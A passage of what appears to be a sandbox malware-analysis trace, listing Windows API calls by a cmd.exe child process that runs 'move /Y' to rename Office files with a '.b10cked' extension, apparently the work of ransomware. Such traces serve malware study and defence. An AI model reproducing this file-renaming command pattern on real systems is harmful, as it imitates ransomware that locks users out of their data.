lpcbData=0x2cead8*=0x4) returned 0x0 [0167.109] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ceadc, lpData=0x2ceae0, lpcbData=0x2cead8*=0x1000 | out: lpType=0x2ceadc*=0x4, lpData=0x2ceae0*=0x40, lpcbData=0x2cead8*=0x4) returned 0x0 [0167.109] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, 
lpType=0x2ceadc, lpData=0x2ceae0, lpcbData=0x2cead8*=0x1000 | out: lpType=0x2ceadc*=0x0, lpData=0x2ceae0*=0x40, lpcbData=0x2cead8*=0x1000) returned 0x2 [0167.109] RegCloseKey (hKey=0x40) returned 0x0 [0167.109] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2cead4 | out: phkResult=0x2cead4*=0x40) returned 0x0 [0167.109] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ceadc, lpData=0x2ceae0, lpcbData=0x2cead8*=0x1000 | out: lpType=0x2ceadc*=0x0, lpData=0x2ceae0*=0x40, lpcbData=0x2cead8*=0x1000) returned 0x2 [0167.109] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ceadc, lpData=0x2ceae0, lpcbData=0x2cead8*=0x1000 | out: lpType=0x2ceadc*=0x4, lpData=0x2ceae0*=0x1, lpcbData=0x2cead8*=0x4) returned 0x0 [0167.109] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ceadc, lpData=0x2ceae0, lpcbData=0x2cead8*=0x1000 | out: lpType=0x2ceadc*=0x0, lpData=0x2ceae0*=0x1, lpcbData=0x2cead8*=0x1000) returned 0x2 [0167.109] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ceadc, lpData=0x2ceae0, lpcbData=0x2cead8*=0x1000 | out: lpType=0x2ceadc*=0x4, lpData=0x2ceae0*=0x0, lpcbData=0x2cead8*=0x4) returned 0x0 [0167.110] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ceadc, lpData=0x2ceae0, lpcbData=0x2cead8*=0x1000 | out: lpType=0x2ceadc*=0x4, lpData=0x2ceae0*=0x9, lpcbData=0x2cead8*=0x4) returned 0x0 [0167.110] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ceadc, lpData=0x2ceae0, lpcbData=0x2cead8*=0x1000 | out: lpType=0x2ceadc*=0x4, lpData=0x2ceae0*=0x9, lpcbData=0x2cead8*=0x4) returned 0x0 [0167.110] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ceadc, lpData=0x2ceae0, lpcbData=0x2cead8*=0x1000 | out: 
lpType=0x2ceadc*=0x0, lpData=0x2ceae0*=0x9, lpcbData=0x2cead8*=0x1000) returned 0x2 [0167.110] RegCloseKey (hKey=0x40) returned 0x0 [0167.110] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886385 [0167.110] srand (_Seed=0x5b886385) [0167.110] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL32.DLL.trx_dll.b10cked\"" [0167.110] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL32.DLL.trx_dll.b10cked\"" [0167.110] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0167.110] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3d1970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0167.111] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0167.111] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0167.111] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0167.111] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0167.111] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0167.111] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0167.111] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0167.111] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0167.111] _wcsicmp 
(_String1="PROMPT", _String2="TIME") returned -4 [0167.111] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0167.111] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0167.111] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0167.111] GetEnvironmentStringsW () returned 0x3d2360* [0167.111] FreeEnvironmentStringsW (penv=0x3d2360) returned 1 [0167.111] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0167.111] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0167.111] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0167.111] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0167.111] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0167.111] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0167.111] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0167.111] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0167.111] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0167.111] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0167.111] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2cf8a0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0167.112] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2cf8a0, lpFilePart=0x2cf89c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2cf89c*="Desktop") returned 0x18 [0167.112] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0167.112] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2cf61c | out: lpFindFileData=0x2cf61c) returned 0x3d09f0 [0167.112] FindClose (in: hFindFile=0x3d09f0 | out: hFindFile=0x3d09f0) returned 1 [0167.112] FindFirstFileW (in: 
lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2cf61c | out: lpFindFileData=0x2cf61c) returned 0x3d09f0 [0167.112] FindClose (in: hFindFile=0x3d09f0 | out: hFindFile=0x3d09f0) returned 1 [0167.112] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2cf61c | out: lpFindFileData=0x2cf61c) returned 0x3d09f0 [0167.112] FindClose (in: hFindFile=0x3d09f0 | out: hFindFile=0x3d09f0) returned 1 [0167.112] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0167.112] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0167.112] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0167.112] GetEnvironmentStringsW () returned 0x3d0210* [0167.113] FreeEnvironmentStringsW (penv=0x3d0210) returned 1 [0167.113] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0167.113] GetConsoleOutputCP () returned 0x1b5 [0167.113] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0167.113] GetUserDefaultLCID () returned 0x409 [0167.114] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0167.114] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2cf9e0, cchData=128 | out: lpLCData="0") returned 2 [0167.114] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2cf9e0, cchData=128 | out: lpLCData="0") returned 2 [0167.114] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2cf9e0, cchData=128 | out: lpLCData="1") returned 2 [0167.114] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0167.114] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0167.114] GetLocaleInfoW (in: 
Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0167.114] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0167.114] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0167.114] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0167.114] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0167.114] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0167.114] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0167.114] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0167.114] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0167.115] GetConsoleTitleW (in: lpConsoleTitle=0x3c0930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0167.115] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0167.115] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0167.115] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0167.116] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0167.117] _wcsicmp (_String1="move", _String2=")") returned 68 [0167.117] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0167.117] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0167.117] _wcsicmp (_String1="IF", _String2="move") returned -4 [0167.117] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0167.117] _wcsicmp (_String1="REM", _String2="move") returned 5 [0167.117] _wcsicmp (_String1="REM/?", 
_String2="move") returned 5 [0167.121] GetConsoleTitleW (in: lpConsoleTitle=0x2cf6d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0167.257] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0167.257] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0167.257] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0167.257] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0167.257] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0167.257] _wcsicmp (_String1="move", _String2="CD") returned 10 [0167.257] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0167.257] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0167.257] _wcsicmp (_String1="move", _String2="REN") returned -5 [0167.257] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0167.257] _wcsicmp (_String1="move", _String2="SET") returned -6 [0167.257] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0167.257] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0167.257] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0167.257] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0167.257] _wcsicmp (_String1="move", _String2="MD") returned 11 [0167.257] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0167.257] _wcsicmp (_String1="move", _String2="RD") returned -5 [0167.258] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0167.258] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0167.258] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0167.258] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0167.258] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0167.258] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0167.258] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0167.258] _wcsicmp (_String1="move", _String2="VER") returned -9 [0167.258] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0167.258] _wcsicmp 
(_String1="move", _String2="EXIT") returned 8 [0167.258] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0167.258] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0167.258] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0167.258] _wcsicmp (_String1="move", _String2="START") returned -6 [0167.258] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0167.258] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0167.258] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0167.260] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0167.260] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0167.260] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2cf494, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2cf48c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2cf48c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0167.261] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0167.261] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0167.261] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0167.261] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0167.261] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0167.261] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0167.261] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0167.261] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0167.261] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0167.261] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0167.261] _wcsnicmp (_String1="COPYCMD", 
_String2="LOGONSE", _MaxCount=0x7) returned -9 [0167.261] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0167.261] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0167.261] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0167.261] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0167.261] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0167.261] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0167.261] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0167.261] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0167.261] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0167.261] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0167.261] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0167.261] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0167.261] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0167.261] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0167.261] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0167.262] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0167.262] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0167.262] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0167.262] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0167.262] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0167.262] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0167.289] _wcsnicmp (_String1="/Y", _String2="/Y", 
_MaxCount=0x2) returned 0 [0167.289] _wcsicmp (_String1="GRINTL~1.TRX", _String2=".") returned 57 [0167.289] _wcsicmp (_String1="GRINTL~1.TRX", _String2="..") returned 57 [0167.289] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\grintl~1.trx")) returned 0x2020 [0167.289] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3d1f20 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0167.289] SetErrorMode (uMode=0x0) returned 0x0 [0167.289] SetErrorMode (uMode=0x1) returned 0x0 [0167.289] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL~1.TRX", nBufferLength=0x104, lpBuffer=0x2cee1c, lpFilePart=0x2cee04 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL~1.TRX", lpFilePart=0x2cee04*="GRINTL~1.TRX") returned 0x3c [0167.289] SetErrorMode (uMode=0x0) returned 0x1 [0167.289] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082")) returned 0x2012 [0167.290] _wcsicmp (_String1="GRINTL~1.TRX", _String2=".") returned 57 [0167.290] _wcsicmp (_String1="GRINTL~1.TRX", _String2="..") returned 57 [0167.290] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\grintl~1.trx")) returned 0x2020 [0167.290] SetErrorMode (uMode=0x0) returned 0x0 [0167.290] SetErrorMode (uMode=0x1) returned 0x0 [0167.290] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL~1.TRX", nBufferLength=0x104, lpBuffer=0x2cf298, lpFilePart=0x2cf030 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL~1.TRX", lpFilePart=0x2cf030*="GRINTL~1.TRX") returned 0x3c [0167.290] SetErrorMode (uMode=0x0) returned 0x1 [0167.290] 
SetErrorMode (uMode=0x0) returned 0x0 [0167.290] SetErrorMode (uMode=0x1) returned 0x0 [0167.290] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL32.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x2cf4a0, lpFilePart=0x2cf030 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL32.DLL.trx_dll.b10cked", lpFilePart=0x2cf030*="GRINTL32.DLL.trx_dll.b10cked") returned 0x4c [0167.290] SetErrorMode (uMode=0x0) returned 0x1 [0167.290] SetLastError (dwErrCode=0x0) [0167.290] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL32.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\grintl32.dll.trx_dll.b10cked")) returned 0xffffffff [0167.290] GetLastError () returned 0x2 [0167.290] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x2ce9ac, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ce9ac) returned 0x3d2130 [0167.291] FindNextFileW (in: hFindFile=0x3d2130, lpFindFileData=0x2ce9ac | out: lpFindFileData=0x2ce9ac) returned 0 [0167.291] GetLastError () returned 0x12 [0167.291] FindClose (in: hFindFile=0x3d2130 | out: hFindFile=0x3d2130) returned 1 [0167.293] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x3d1cc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3d1cc0) returned 0x3d2130 [0167.293] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL32.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x2cec44, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL32.DLL.trx_dll.b10cked", lpFilePart=0x0) returned 0x4c [0167.293] GetFullPathNameW (in: 
lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL32.DLL.trx_dll", nBufferLength=0x104, lpBuffer=0x2cec44, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL32.DLL.trx_dll", lpFilePart=0x0) returned 0x44 [0167.293] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL32.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\grintl32.dll.trx_dll")) returned 0x2020 [0167.293] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL32.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\grintl32.dll.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL32.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\grintl32.dll.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0167.294] FindClose (in: hFindFile=0x3d2130 | out: hFindFile=0x3d2130) returned 1 [0167.294] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x2cebf8 | out: _Buffer=" 1") returned 9 [0167.294] _get_osfhandle (_FileHandle=1) returned 0x7 [0167.294] GetFileType (hFile=0x7) returned 0x2 [0167.294] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0167.294] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ceb84 | out: lpMode=0x2ceb84) returned 1 [0167.294] _get_osfhandle (_FileHandle=1) returned 0x7 [0167.294] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2cebb8 | out: lpConsoleScreenBufferInfo=0x2cebb8) returned 1 [0167.295] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0167.295] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x2cebf8 | out: 
lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0167.295] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x2cebdc, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2cebdc*=0x1a) returned 1 [0167.295] _get_osfhandle (_FileHandle=1) returned 0x7 [0167.295] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0167.296] _get_osfhandle (_FileHandle=1) returned 0x7 [0167.296] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0167.296] _get_osfhandle (_FileHandle=0) returned 0x3 [0167.296] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0167.296] SetConsoleInputExeNameW () returned 0x1 [0167.296] GetConsoleOutputCP () returned 0x1b5 [0167.296] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0167.296] SetThreadUILanguage (LangId=0x0) returned 0x409 [0167.296] exit (_Code=0) Process: id = "285" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16bc0" os_pid = "0xdf8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL32.REST.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 22687 start_va = 0x10000 end_va = 0x2ffff 
